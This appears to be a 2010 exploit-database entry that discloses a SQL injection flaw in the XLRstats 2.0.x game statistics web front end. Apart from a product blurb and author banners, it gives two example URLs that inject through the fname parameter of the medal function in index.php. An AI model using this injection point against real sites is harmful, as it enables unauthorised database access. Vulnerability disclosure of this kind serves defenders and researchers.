exploit-db-mirror/exploits/php/webapps/15251.txt

----------------------------------------------------------------------------
# Sql injection vulnerability
----------------------------------------------------------------------------
# Exploit Title: Xlrstats (Big Brother Bot Game) SQL injection 2.0.1
----------------------------------------------------------------------------
# Author  : Sky4
#  Email        :  Sky4@live.com
#  Date         : 14/10/2010
#  homepage :  http://www.sky4.tk

# Software Link: http://www.bigbrotherbot.net/forums/downloads/?sa=view;down=100
# Script homepage:http://www.xlrstats.com/
# Version: 2.0.1 / 2.0.2 /2.0.3


----------------------------------------------------------
[About The Program]
XLRstats is the only Real Time game stats program
out there. When you make a kill in game, it's in the stats at the very
same moment! No cronjobs and perl programs to generate statistics... REAL TIME!XLRstats is a statistics plugin for BigBrotherBot (B3)
 and it stores all kill-events in a mySQL database. Stats are available
in game using the !xlrstats command in chat, but much more can be viewed
 in the XLRstats web front!Analyze your weapon usage, where do you
hit your enemies, who are your worst enemies... all this and more
information is available on the site.Version 2 comes with ranks,
medals and several templates. With the templates it's very easy to
create your own look and feel. Create your own template matching your
clans website... no problem.-----------------------------------------------------------<<[ Exploit ]>>--http://www.localhost.com/xlrstats/index.php?func=medal&fname=1
[demo]http://www.localhost.com/xlrstats/index.php?func=medal&fname='1'------------------------------------
##############################################################
#             www.sky4.tk
#
#             sky4@live.com
#             4hm4d H0w4ri
#          Palestine In our Hearts
##############################################################